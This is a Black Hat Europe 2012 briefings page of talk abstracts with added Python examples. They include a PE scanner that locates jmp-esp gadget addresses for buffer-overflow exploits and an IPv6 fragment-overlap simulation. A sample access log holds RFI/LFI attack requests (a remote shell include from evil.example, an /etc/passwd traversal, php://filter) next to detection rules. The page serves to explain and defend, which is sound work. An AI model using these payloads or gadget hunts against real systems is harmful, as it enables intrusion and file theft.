Black Hat Europe 2012

Black Hat Europe 2012 // Briefings

Grand Krasnapolsky Hotel
March 14 - 16

Whitfield Diffie
Yet Another Look at the State of Security

Every day brings another sobering manifestation of cyber-insecurity and another prediction of doom from the invited speakers at our seminars, yet the internet juggernaut keeps juggernauting along. We will take an historical and critical look at the current state of affairs that leaves in its wake a fatalistic optimism.


Axelle Apvrille - Guillaume Lovet
An Attacker's Day into Virology: Human vs Computer

Computer virology bears such a strong resemblance to human virology that the two worlds have often been compared humorously. In this presentation, we wish to push the comparison further down into the details of implementation and attack strategies. Have you ever wondered how much those nasty biological viruses actually invented before Black Hats did? They surely invented brute-force attacks, polymorphism and time bombs, and yet they never presented at Black Hat for this!

We intend to give them credit for some of their best attack scenarios. For instance, Influenza, which intentionally omits a replication error-checking protein so that its copies mutate randomly, is a potential nominee.

On the other hand, there are a few techniques we can only be grateful biology has not picked up yet, and we dearly hope viruses won't ever evolve them from Black Hat attendees' genomes. Indeed, what would happen to us if chicken pox, measles or rotavirus played cat and mouse with medical doctors and continuously learned to detect test tubes (virtual machines) and microscopes (reverse engineering tools)?

Finally, considering the advances of cybernetics, we contemplate the possibilities of actually witnessing a convergence between human and computer viruses in a more or less distant future.

Jerome Athias
Opcodes Database Revival (or Why I Prefer to Collect jmp ESP Than Pokemons)

"The Opcode Database is an important resource for writers of new exploits. Buffer overflow exploits on Windows often require precise knowledge of the position of certain machine language opcodes in the attacked program or included DLLs. These positions differ in the various versions and patch-levels of a given operating system, and they are all documented and conveniently searchable in the Opcode Database. This allows one to write buffer overflow exploits which work across different versions of the target operating system." Some tips and tools to build your own opcodes database or leech mine while drinking a beer.

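The core of an opcode database is a scanner that walks a PE image section by section, finds the gadget bytes and maps each file offset back to a virtual address. The following is an added example written for this page, not the speaker's tool or the Metasploit database code: it parses the PE headers by hand (no third-party library), scans for `jmp esp` (FF E4), `call esp` (FF D4) and `push esp; ret` (54 C3), and flags addresses containing bytes that commonly break string-based overflows. The PE it scans is constructed in `build_sample_pe()` as a stand-in for a real DLL; its image base, section and byte layout are assumptions.

```python
import struct

# Gadget byte patterns an exploit writer typically hunts for (x86).
GADGETS = {
    "jmp esp": b"\xff\xe4",
    "call esp": b"\xff\xd4",
    "push esp; ret": b"\x54\xc3",
}


def parse_pe(data):
    """Return (image_base, [(section_name, rva, raw_offset, raw_size), ...]) for a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                      # start of the optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                       # PE32: 32-bit ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                     # PE32+: 64-bit ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    sections = []
    for i in range(num_sections):
        rec = opt + opt_size + 40 * i        # section headers follow the optional header
        name, _vsize, rva, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, rec)
        sections.append((name.rstrip(b"\0").decode("latin-1"), rva, raw_ptr, raw_size))
    return image_base, sections


def find_opcodes(data, gadgets=GADGETS):
    """Scan each section's raw bytes and map every hit to image_base + RVA + offset."""
    image_base, sections = parse_pe(data)
    hits = []
    for sec_name, rva, raw_ptr, raw_size in sections:
        blob = data[raw_ptr:raw_ptr + raw_size]
        for gadget, pattern in gadgets.items():
            pos = blob.find(pattern)
            while pos != -1:
                hits.append((gadget, sec_name, image_base + rva + pos))
                pos = blob.find(pattern, pos + 1)
    return sorted(hits, key=lambda h: h[2])


def has_bad_chars(address, bad=b"\x00\x0a\x0d"):
    """True if the little-endian encoding of the address contains a byte the target input filters."""
    return any(b in bad for b in struct.pack("<I", address))


def build_sample_pe():
    """Constructed minimal PE32 with one .text section; a stand-in for a real DLL (assumed layout)."""
    image_base, text_rva, raw_ptr = 0x7C800000, 0x1000, 0x400
    text = bytearray(b"\x90" * 32)
    text[10:12] = GADGETS["jmp esp"]
    text[20:22] = GADGETS["call esp"]
    text[25:27] = GADGETS["push esp; ret"]
    dos = bytearray(0x80)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)           # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)              # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), text_rva,
                      len(text), raw_ptr, 0, 0, 0, 0, 0x60000020)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec
    return header + b"\0" * (raw_ptr - len(header)) + bytes(text)


if __name__ == "__main__":
    for gadget, section, va in find_opcodes(build_sample_pe()):
        flag = " (bad chars)" if has_bad_chars(va) else ""
        print("0x%08x %-6s %s%s" % (va, section, gadget, flag))
```

Run it against real DLLs by replacing `build_sample_pe()` with the file contents, and record the OS version and patch level alongside each hit, since that is the whole point of the database. One caveat the abstract leaves implicit: a module compiled with ASLR support is rebased at load time, so a static address from the database only works against modules that opted out of it.
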
Antonios Atlasis
Attacking IPv6 Implementation Using Fragmentation

IP fragmentation attacks are not a new issue. There are many publications regarding their exploitation for various purposes, including, but not limited to, OS fingerprinting, IDS/IPS insertion/evasion, firewall evasion and even remote code execution. The adoption of the new IP version, IPv6, has opened new potential exploitation fields to attackers and pen testers. In this paper, it will be examined whether fragmentation issues still remain in the IPv6 implementations of some of the most popular Operating Systems and whether they can also be used for the aforementioned purposes. To this end, several fragmentation attacks will be presented and their impact will be examined. As will be shown, most of the popular OSes, such as Windows, Linux and OpenBSD, are susceptible to such attacks. In each case, the corresponding proof of concept code is provided. As will be explained, such attacks, under specific circumstances, can lead to OS fingerprinting, IDS insertion/evasion and firewall evasion. Finally, these tests will also show which OS appears to be the most immune to IPv6 fragmentation attacks.
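
The fingerprinting and IDS-insertion effects come from one question: when two fragments of the same datagram overlap, whose bytes does the receiver keep? The following is an added example, not the speaker's proof-of-concept code: it builds IPv6 packets carrying a Fragment extension header (next header 44) from scratch, parses them back, and reassembles a deliberately overlapping pair under three policies. The addresses and the identification value are constructed, and "No Next Header" (59) stands in for a real upper-layer protocol. The `rfc5722` policy models what RFC 5722 requires, namely dropping the whole datagram on any overlap.

```python
import struct

IPV6_NH_FRAGMENT = 44   # Fragment extension header
IPV6_NH_NONE = 59       # "No Next Header"; stands in for the upper-layer protocol here
SRC = bytes.fromhex("20010db8000000000000000000000001")  # constructed 2001:db8::1
DST = bytes.fromhex("20010db8000000000000000000000002")  # constructed 2001:db8::2


def ipv6_header(payload_len, next_header, src, dst, hop_limit=64):
    # Version 6, traffic class 0, flow label 0; payload length counts extension headers
    return struct.pack("!IHBB", 0x60000000, payload_len, next_header, hop_limit) + src + dst


def fragment_header(next_header, offset_units, more, ident):
    # 13-bit offset in 8-octet units, 2 reserved bits, 1-bit M (more fragments) flag
    return struct.pack("!BBHI", next_header, 0, (offset_units << 3) | (1 if more else 0), ident)


def build_fragment(ident, offset_units, more, data, upper=IPV6_NH_NONE, src=SRC, dst=DST):
    ext = fragment_header(upper, offset_units, more, ident)
    return ipv6_header(len(ext) + len(data), IPV6_NH_FRAGMENT, src, dst) + ext + data


def parse_fragment(pkt):
    payload_len, next_header = struct.unpack_from("!HB", pkt, 4)
    if next_header != IPV6_NH_FRAGMENT:
        raise ValueError("first extension header is not a Fragment header")
    upper, _res, off_m, ident = struct.unpack_from("!BBHI", pkt, 40)
    return {
        "src": pkt[8:24], "dst": pkt[24:40], "ident": ident, "upper": upper,
        "offset": (off_m >> 3) * 8, "more": bool(off_m & 1),
        "data": pkt[48:48 + payload_len - 8],
    }


def reassemble(fragments, policy):
    """Reassemble fragments in arrival order under an overlap policy:
    'first' keeps the bytes that arrived first, 'last' lets later fragments overwrite,
    'rfc5722' discards the datagram on any overlap (the RFC 5722 behaviour)."""
    buf = bytearray()
    written = set()
    for f in fragments:
        start, data = f["offset"], f["data"]
        end = start + len(data)
        if end > len(buf):
            buf.extend(b"\0" * (end - len(buf)))
        if policy == "rfc5722" and any(i in written for i in range(start, end)):
            return None
        for i, byte in enumerate(data):
            pos = start + i
            if policy == "first" and pos in written:
                continue
            buf[pos] = byte
            written.add(pos)
    return bytes(buf)


def overlap_probe():
    """Two fragments of datagram 0x1234: 16 bytes at offset 0, then 8 bytes at offset 8
    that overlap the tail of the first one."""
    return [
        parse_fragment(build_fragment(0x1234, 0, True, b"A" * 8 + b"B" * 8)),
        parse_fragment(build_fragment(0x1234, 1, False, b"C" * 8)),
    ]


if __name__ == "__main__":
    frags = overlap_probe()
    for policy in ("first", "last", "rfc5722"):
        print(policy, reassemble(frags, policy))
```

On a live target the same two fragments would be sent through a raw socket (or Scapy) with a real upper-layer payload such as an ICMPv6 echo request whose checksum is only valid for one of the two candidate reassemblies; which reassembly the host answers reveals its policy, and a host that answers neither is the RFC 5722 case. An IDS that reassembles with a different policy than the host it protects sees a different payload, which is the insertion/evasion problem the abstract refers to.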

Don A. Bailey
War Texting: Weaponizing Machine to Machine Systems

Devices have been attached to the telephone network for years. Typically, we think of these devices in terms of modems, faxes, or TTY systems. Now, there is a growing shift in the nature of the devices that are accessible over the telephone network. Today, A-GPS tracking devices, 3G Security Cameras, Urban Traffic Control systems, SCADA sensors, Home Control and Automation systems, and even vehicles are now telephony enabled. These systems often receive control messages over the telephone network in the form of text messages (SMS) or GPRS data. These messages can trigger actions such as firmware updates, Are You There requests, or even solicitations for data. As a result, it is imperative for mobile researchers to understand how these systems can be detected by attackers on the global telephone network, then potentially abused.

These systems are increasingly capable of affecting the physical world around us. Additionally, devices attached to the phone network cannot be easily compartmentalized or firewalled from potential abusers the same way that IP enabled systems can. Therefore, understanding the threat models associated with these devices and the telephone network will allow mobile researchers and embedded engineers to correctly implement security solutions that minimize a device's exposure to threat actors.

Empirical evidence will be presented that demonstrates creative and successful ways to classify potential devices amongst millions of phone numbers world wide. Once properly classified, devices can be interacted with in simple and efficient ways that will be revealed by the speaker.

Michael Baker
Finding Needles in Haystacks (The Size of Countries)

The lament of security analysts is often a limitation in the amount of data they can process, and the ensuing loss of data fidelity as size increases. As data sets grow they become unwieldy, making it difficult to add context through correlating security event data with other relevant data sets.

Full packet capture provides a method for maintaining a forensic copy of all network conversations. However the reality up until now is that full packet capture and analysis has been bounded by the size of the data, the time to process it and the ability of applications and tools to encode key attack, deviations, mis-use and anomaly data into visualizations.

When you can store all of your network data the issue then becomes how do you analyze it. How do you find the single conversation you are looking for in trillions of conversations?

Big Data has supplied both a method for parallel computation and at the same time the cost of storing all network data (full packet capture) is within reach of all organizations. At the same time threats are becoming more blended, complex and difficult to find. Big Data tools such as Apache Hadoop, PIG and NoSQL databases provide the ability to perform complex network traffic analysis at petabyte scale. These tools can be leveraged using the Amazon Cloud (Elastic Map Reduce) to process, query and persist packet capture data.

With these tools there is no time-cost trade off to analyzing every single conversation on a network, enriching the data, intersecting data sets and sharing anonymised data sets.

Allowing you to answer questions that not many tools can:

  • How can I find Zero Day attacks in past traffic?
  • How can I better detect attacks at greater confidence?
  • What is normal?
  • What is new (never seen before)?
  • Which attacks are similar to other attacks?
  • What is the operating system and patch level of my attackers?
  • What protocols are strongly correlated in relation to sessions, bandwidth and payloads?
  • What sessions are tunnels?
  • After each attack how did the victim's sessions and protocols change?
  • What is a normal HTTP payload for each of my web servers, and how does an attack differ?
  • What are attackers doing within HTTPS sessions to my websites?
  • How can I intersect white and blacklists with my network packet captures?

Tal Be'ery
FYI: You've Got LFI

RFI/LFI attacks are a favorite choice for hackers. Why? A successful attack allows the execution of arbitrary code on the attacked platform in the context of the web application. With the same level of authorization, it can practically take over the server.

Surprisingly, however, RFI/LFI are still considered the underdogs of vulnerabilities. Attractive RFI/LFI attack targets are commonly PHP applications. With more than 77% of today's websites running PHP, RFI should be on every security practitioner's radar, but isn't. Some notorious RFI/LFI examples include Anonymous using RFI bots to attack their targets and TimThumb, a WordPress add-on vulnerable to LFI which paved the way to 1.2 million infected websites.

It's time to seriously examine RFI/LFI attacks. In this talk we quantify the prevalence of this attack based on our findings in the wild. We present proof of concepts which demonstrate how these attacks evade detection. We will also present new approaches to defeating this type of attack. In particular, we:

  • Introduce the RFI/LFI concepts and evaluate their potential effectiveness in the wild
  • Demonstrate RFI attacks, starting with the basics and moving to recently witnessed advanced schemes which exploit PHP streams
  • Present a proof of concept of how to hide an LFI attack within benign-looking documents such as pictures and PDF documents
  • Reveal a new RFI/LFI attack vector which evades anti-malware by splitting the attack vector across different textual fields of a picture
  • Provide mitigation steps to defend against RFI/LFI attacks, including a novel approach which uses a shell-hosting feed
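
What the three attack flavours above look like on the wire is the same thing: a file-name parameter that carries a remote URL (RFI), a PHP stream wrapper such as php://filter or data:// (the "PHP streams" schemes), or a traversal/null-byte path (LFI). The following is an added example, not code from the talk or from Imperva: a detector run over a few constructed Apache access-log lines, plus the allowlist-and-containment check that is the standard mitigation on the application side. The log lines, IPs and parameter name `page` are all constructed.

```python
import os
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-log lines for the example; none of these come from the talk.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Mar/2012:10:00:01 +0100] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Mar/2012:10:00:02 +0100] "GET /index.php?page=http://evil.example/shell.txt%3F HTTP/1.1" 200 7331 "-" "libwww-perl/5.8"
10.0.0.9 - - [14/Mar/2012:10:00:03 +0100] "GET /index.php?page=..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1804 "-" "libwww-perl/5.8"
10.0.0.7 - - [14/Mar/2012:10:00:04 +0100] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Mar/2012:10:00:05 +0100] "GET /index.php?page=data://text/plain;base64,SGVsbG8%3D HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)
PHP_WRAPPER = re.compile(r'^(?:php|data|expect|phar|zip|glob|compress\.\w+)://', re.I)
TRAVERSAL = re.compile(r'(?:\.\./|\.\.\\)')
ABS_SENSITIVE = re.compile(r'^/(?:etc|proc|var|windows)/', re.I)


def classify_value(value):
    """Return 'rfi', 'wrapper', 'lfi' or None for one query-string value."""
    v = unquote(value)              # a second decode catches double-encoded payloads
    if REMOTE_URL.match(v):
        return "rfi"
    if PHP_WRAPPER.match(v):
        return "wrapper"
    if TRAVERSAL.search(v) or "\x00" in v or ABS_SENSITIVE.match(v):
        return "lfi"
    return None


def scan_log(text):
    """Yield (client_ip, kind, parameter, decoded_value) for every suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, _method, url, _status = m.groups()
        for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                alerts.append((ip, kind, key, unquote(value)))
    return alerts


def safe_include_path(base_dir, requested, allowed):
    """Mitigation on the application side: an allowlist of include names *and* a
    realpath containment check, so a bad allowlist entry still cannot escape base_dir."""
    if requested not in allowed:
        return None
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, full]) != base:
        return None
    return full


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The detector only sees the request; the "payload hidden in a picture" variant from the talk arrives as an upload and is then included by a plain-looking path, so the upload handler, not the log scanner, is where that one has to be caught (reject files whose textual fields contain `<?` and store uploads outside the include root). The allowlist resolver is the control that makes both variants moot for the include itself.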

Andrey Belenko - Dmitry Sklyarov
"Secure Password Managers" and "Military-Grade Encryption" on Smartphones: Oh Really?

The task of providing privacy and data confidentiality in mobile applications becomes more and more important as the adoption of smartphones and tablets grows. As a result, there are a number of vendors and applications providing solutions to address those needs, such as password managers and file encryption utilities for mobile devices.

In this talk we will analyze several password managers and file encryption applications for the Apple iOS platform and demonstrate that they often do not provide any reasonable level of security, and that syncing data between desktop and mobile versions of the applications increases the risk of compromise. We will also show that the best way to provide privacy and confidentiality on the Apple iOS platform is by adhering to the Apple Developer Guidelines and not by reinventing the wheel.

Andy Davis
HDMI - Hacking Displays Made Interesting

Picture this scene, which happens thousands of times every day all around the world: Someone walks into a meeting room, sees a video cable and plugs it into their laptop. The other end of the cable is out of sight – it just disappears through a hole in the table. What is it connected to? Presumably the video projector bolted to the ceiling, but can it be trusted to just display their PowerPoint presentation?...

This presentation discusses the security of video drivers which interpret and process data supplied to them by external displays, projectors and KVM switches. It covers all the main video standards, including VGA, DVI, HDMI and DisplayPort. It also details the construction of a hardware-based EDID fuzzer using an Arduino Microcontroller and a discussion of some of its findings.

Stephen de Vries
Beyond Scanning: Automating Web Application Security Tests

Two new trends in web integration testing provide fresh tools to automate business logic and access control tests for web applications. These have traditionally been weak areas for web security scanning tools.

Security testing is often disconnected from the rest of the software development and testing phases. This talk will introduce the attendees to 3 key concepts that will allow security testing to be easily integrated into the development cycle.

  1. Behaviour-Driven Development (BDD) and the easyb tool provide a simple solution for defining security requirements upfront and then testing those requirements throughout the development cycle, e.g. by integrating into a continuous build environment.
  2. Page Objects allow security tests to be separated from the web application. Traditional Selenium tests suffer from being brittle and difficult to maintain. Page Objects help solve that problem and allow the same set of security tests to be run unmodified on almost any web application. A suite of easyb security tests will be released that can be configured and executed on most web applications.
  3. Burp Intruder is a popular web app testing tool but is mostly used during manual testing. A new plugin will be released that exposes the Burp API over HTTP/JSON which can then be used in automated test scripts.

Live code demonstrations will be used throughout to illustrate the concepts and introduce the tools.
Two new tools will be released:

  • EasybSecurity, a set of easyb specification and testing scripts that perform security testing on web applications.
  • RestyBurp, a RESTful interface over HTTP/JSON to the Burp testing tool to allow other applications to easily drive and communicate with Burp.

Tyrone Erasmus
The Heavy Metal That Poisoned the Droid

The widely publicised malware on the Android Marketplace relies on the fact that users do not review permissions when installing applications. A lesser known fact is that an installed application with no special permissions will often be able to access a user's most sensitive data regardless. Upon reviewing multiple Android handsets and applications, the sheer number of information disclosure vulnerabilities found was alarming.

A live demonstration will be conducted on well-known Android phones, showing how a person's most sensitive data can be compromised by an attacker. After discovering many vulnerabilities in Android applications that allow information to be leaked and privileges to be escalated, it was clear that there was a need for a tool that allows security specialists to view the attack surface of applications from an unprivileged context and interact with them in an intuitive manner.

Mercury is a tool that allows its user to dynamically examine the attack surface of applications that reside on a device and exploit them. It is split into two parts, using a client/server model in order to meet its goals.

The design of the system works by placing a low-privileged server application on the Android device which interacts with a command-line interface on the user's computer. This model provides users with a rich experience that will not disappoint. This class of tool is very different from source code analysis, as it is aimed at being a practical interactive platform for Android bug hunters.

The main objective of Mercury is to be an auditing tool that can be used for many purposes. Some features which make this possible are the following:

  • The ease with which a user can find relevant information about exposed application attack vectors
  • Command-line interaction with applications on the device in order to find vulnerabilities
  • The ability to write proof-of-concept exploits for vulnerabilities using a range of pre-defined commands. This effectively removes the need for custom application writing in order to perform tests against the target vulnerability.
  • MWR Labs research that allows the exploitation of debuggable applications, SQL injection on content providers and various other privilege escalation techniques

The exploitation wing of Mercury is currently under heavy development, finding innovative ways of escalating privileges from an unprivileged context. It is the hope that this tool will be released to the public as part of Tyrone's talk at BlackHat EU 2012. This talk would present multiple vulnerabilities found in Android handsets and techniques for exploiting different applications using Mercury.

Dan Guido - Mike Arpaia
The Mobile Exploit Intelligence Project

As organizations look to deploy larger numbers of mobile devices over this year, there is widespread disagreement in the security industry over which platforms are more secure, what mobile security measures are effective, and what the greatest risks of these platforms are. At the same time, the mobile malware community, while still in its infancy, is developing rapidly and several successful attacks have been executed against iOS and Android in the last year.

In this talk, we demonstrate an intelligence-driven approach to mobile defense, focused on attacker capabilities and methods, with data collected from past remote attacks and jailbreaks against Android and iOS. This analysis identifies the means by which exploits are developed and distributed in attacks, separates defenses that work from defenses that don't, and provides analytical tools that attendees can use to objectively evaluate the exploitability of mobile operating systems. Finally, we use this empirical data on attacker capabilities to make projections on where mobile malware is headed in the near to long term.

Takahiro Haruyama - Hiroshi Suzuki
One-byte Modification for Breaking Memory Forensic Analysis

Memory forensics is an effective technique to detect malware quickly or extract sensitive user data from RAM. Memory forensics is separated into two parts: memory acquisition and analysis. So far, some anti-acquisition methods have been proposed and demonstrated, but there has been no sufficient discussion of anti-analysis ones.

This presentation introduces anti-analysis methods based on unconsidered assumptions in the existing analysis tools. By using these methods, attackers can abort memory analysis and make the result empty. Since it is difficult for forensic analysts to figure out the cause from the error messages, they will simply conclude that the acquired memory images are corrupted. Specifically, the anti-analysis methods focus on three operations performed in memory analysis. All major analysis tools take several rapid approaches in these operations. If attackers want to make the analysis tools fail with the smallest modification, all they have to do is modify one byte of the data structure related to one such approach. Of course, the modification has no impact on the running system.

The presentation is made up as follows. First, I give an overview of memory acquisition and analysis: memory image formats, evaluation of acquisition tools, memory analysis methods, comparison of analysis tools, and so on. Next, I point out the issues of each analysis tool and the key structures it refers to, then I demonstrate that all analysis tools fail when data in those structures is modified. Finally, I suggest desired usages for forensic analysts and improvement plans for developers to decrease the risk of anti-analysis methods.

Marcia Hofmann - Seth Schoen
Defending Privacy at the U.S. Border: A Guide for Travelers Carrying Digital Devices

A series of unfortunate court decisions allows border agents to search travelers' laptops, mobile phones, and other digital devices without limitation at the United States border. These searches are relatively rare, but they continue to occur and could become more routine as computer forensics gets cheaper and agents develop new ways of targeting particular travelers. How can international travelers protect themselves when they cross the United States border?

Marcia Hofmann and Seth Schoen of the Electronic Frontier Foundation will provide a clear, up-to-date, and thorough overview of this issue for all travelers to the U.S. based on their recently published white paper "Defending Privacy at the U.S. Border: A Guide for Travelers Carrying Digital Devices." This presentation combines legal and technical perspectives, discussing the law and policies that apply when international travelers enter or leave the United States, as well as various ways that travelers can safeguard electronic devices and digital information at the border.

Vincenzo Iozzo
A Sandbox Odyssey

In this talk the App Sandboxing technology will be dissected to understand the strengths of this technology and its shortcomings: specifically, which actions a sandboxed app is allowed to perform and how those actions can harm a user. Moreover, the "logical" flaws of this security countermeasure will be analyzed to verify how effective and feasible it is to apply a coherent and bulletproof isolation of the application from the surrounding system.

Jeff Jarmoc
SSL/TLS Interception Proxies and Transitive Trust

SSL/TLS is entrusted with securing many of the communications services we take for granted in our connected world. Threat actors are also aware of the advantages offered by encrypted communication channels, and increasingly utilize encryption for exploit delivery, malware command-and-control and data exfiltration.

To counter these tactics, organizations are increasingly deploying security controls that intercept end-to-end SSL/TLS channels. Web proxies, DLP systems, specialized threat detection solutions, and network IPSs now offer functionality to intercept, inspect and filter encrypted traffic. Similar functionality is also present in lawful intercept systems and solutions enabling the broad surveillance of encrypted communications by governments. Broadly classified as "SSL/TLS Interception Proxies," these solutions act as a man-in-the-middle, violating the end-to-end security guarantees promised by SSL/TLS.

In this presentation we'll explore a phenomenon known as "transitive trust," and explain how deployment of SSL/TLS interception solutions can introduce new vulnerabilities. We detail a collection of new vulnerabilities in widely used interception proxies first discovered by the Dell SecureWorks CTU and responsibly disclosed to the impacted vendors. These vulnerabilities enable attackers to more easily intercept and modify secure communications. In addition, we will introduce a public web site that organizations can use to quickly and easily test for these flaws.

Michael Jordon - James Forshaw
CANAPE: Bytes Your Bits

Testing and exploiting binary network protocols can be both complex and time consuming. More often than not, custom software needs to be developed to proxy, parse and manipulate the traffic. CANAPE is a new Windows tool we are releasing at Black Hat which takes the existing paradigm of web application testing tools (such as CAT, Burp or Fiddler) and applies it to any network protocol. CANAPE provides a user interface that facilitates the capture and replaying of binary network traffic, whilst providing a framework to develop parsers and fuzzers.

This presentation will follow a worked example of using CANAPE to analyse the Citrix ICA binary protocol, allowing the discovery of a heap corruption bug that can be used to gain remote code execution on Citrix clients.

Ling Chuan Lee - Chan Lee Yee
GDI Font Fuzzing in Windows Kernel For Fun

There are different types of fonts available within Windows, falling into two categories: GDI fonts and device fonts. This talk will cover GDI TrueType and GDI bitmap fonts only, on the Windows platform.

In GDI, one typically creates a font by filling in a LOGFONT structure and then calling CreateFontIndirect, which returns a font handle. As the name suggests, a LOGFONT structure describes a logical font: if the user draws some text using that font handle, GDI will look for a matching physical font to draw the text. If it doesn't find a matching font name, it will use some other font.

The consequence is that the font fuzzer works at a lower level, through the physical font APIs provided by GDI itself, for instance GetFontData, GetGlyphIndices and even ExtTextOut when used with the ETO_GLYPH_INDEX flag. The font fuzzer in this talk aims to trigger the font vulnerabilities published on the internet; two vulnerabilities in the Windows kernel, MS11-077 and MS11-087, in the handling of crafted fonts will be discussed in this talk.
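
Both the EDID fuzzer in Andy Davis's talk and the GDI font fuzzer here face the same first hurdle: the parser they target checks a checksum before it looks at anything interesting, so random mutation that ignores the checksum never reaches the code under test. The following is an added example, not the code of either speaker: it builds a constructed 128-byte EDID base block and a constructed two-table TrueType skeleton, mutates bytes in the region of interest, and then repairs the checksums (EDID: all 128 bytes sum to 0 mod 256; TrueType: each table directory entry holds the big-endian 32-bit sum of its padded table). The EDID fields and table contents are placeholders, not data from a real monitor or font.

```python
import random
import struct

# ---- EDID base block (128 bytes): fixed 8-byte header, checksum byte at offset 127 ----
EDID_HEADER = bytes.fromhex("00ffffffffffff00")


def edid_fix_checksum(block):
    b = bytearray(block)
    b[127] = (-sum(b[:127])) & 0xFF      # all 128 bytes must sum to 0 mod 256
    return bytes(b)


def edid_valid(block):
    return len(block) == 128 and block[:8] == EDID_HEADER and sum(block) % 256 == 0


def build_sample_edid():
    """Constructed, not a real monitor's EDID: header, version 1.4, placeholder descriptor."""
    b = bytearray(128)
    b[0:8] = EDID_HEADER
    b[18], b[19] = 1, 4                  # EDID version 1, revision 4
    b[54:72] = b"\x01" * 18              # first 18-byte detailed timing descriptor (placeholder)
    return edid_fix_checksum(bytes(b))


# ---- TrueType: 12-byte offset table, then 16-byte records (tag, checksum, offset, length) ----
def ttf_table_checksum(data):
    data = data + b"\0" * (-len(data) % 4)  # pad to a 32-bit boundary before summing
    return sum(struct.unpack(">%dI" % (len(data) // 4), data)) & 0xFFFFFFFF


def ttf_parse_directory(font):
    num_tables = struct.unpack_from(">H", font, 4)[0]
    tables = {}
    for i in range(num_tables):
        rec = 12 + 16 * i
        tag, csum, off, length = struct.unpack_from(">4sIII", font, rec)
        tables[tag.decode("latin-1")] = {"checksum": csum, "offset": off, "length": length, "record": rec}
    return tables


def ttf_fix_checksums(font):
    """Recompute every table checksum so a mutated table still passes the directory check.
    A real font also carries head.checkSumAdjustment over the whole file; this sample has no 'head'."""
    f = bytearray(font)
    for t in ttf_parse_directory(font).values():
        table = bytes(f[t["offset"]:t["offset"] + t["length"]])
        struct.pack_into(">I", f, t["record"] + 4, ttf_table_checksum(table))
    return bytes(f)


def build_sample_ttf():
    """Constructed two-table skeleton; the table bodies are dummies, not real cmap/glyf data."""
    tables = [(b"cmap", bytes([0, 0, 0, 1]) + b"\0" * 8), (b"glyf", bytes(range(20)))]
    n = len(tables)
    entry_selector = n.bit_length() - 1
    search_range = (1 << entry_selector) * 16
    header = struct.pack(">IHHHH", 0x00010000, n, search_range, entry_selector, n * 16 - search_range)
    directory, body = b"", b""
    data_start = 12 + 16 * n
    for tag, data in tables:
        directory += struct.pack(">4sIII", tag, ttf_table_checksum(data), data_start + len(body), len(data))
        body += data + b"\0" * (-len(data) % 4)
    return header + directory + body


def mutate_region(blob, lo, hi, count, rng):
    """Overwrite `count` random bytes in [lo, hi) with random values."""
    b = bytearray(blob)
    for _ in range(count):
        b[rng.randrange(lo, hi)] = rng.randrange(256)
    return bytes(b)


def edid_case(seed):
    rng = random.Random(seed)
    return edid_fix_checksum(mutate_region(build_sample_edid(), 54, 127, 4, rng))


def ttf_case(seed, table="glyf"):
    rng = random.Random(seed)
    font = build_sample_ttf()
    t = ttf_parse_directory(font)[table]
    return ttf_fix_checksums(mutate_region(font, t["offset"], t["offset"] + t["length"], 3, rng))


def ttf_checksums_consistent(font):
    return all(ttf_table_checksum(font[t["offset"]:t["offset"] + t["length"]]) == t["checksum"]
               for t in ttf_parse_directory(font).values())
```

For the EDID case the 128 bytes would be served by the Arduino in response to the host's I2C reads, one `edid_case(seed)` per hot-plug; for the font case each `ttf_case(seed)` is written to disk and loaded through the physical-font APIs named above, and the seed is logged so a crash can be reproduced.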

Felix 'FX' Lindner
Apple vs. Google Client Platforms

We will discuss the two different approaches Apple and Google take for the client platforms iPad and Chromebook, how they are similar and how they are not.

From the security architecture and integrity protection details to the account and identity that link you firmly back to the respective vendor, we will provide the big picture with occasional close-up shots. Here is what power the vendor has over you, or what powers it hands to arbitrary attackers at expensive coffee shops with free WiFi through failures in logic, binary or HTML.

David Litchfield
An Assortment of Database Goodies

This talk will look at a mixed bag of security weaknesses in the Oracle database server with demonstrations on exploiting them to gain DBA privileges.

Steve Lord
Drop It Like It's Hotspot: Hacking Mifi Routers For Nefarious Purposes

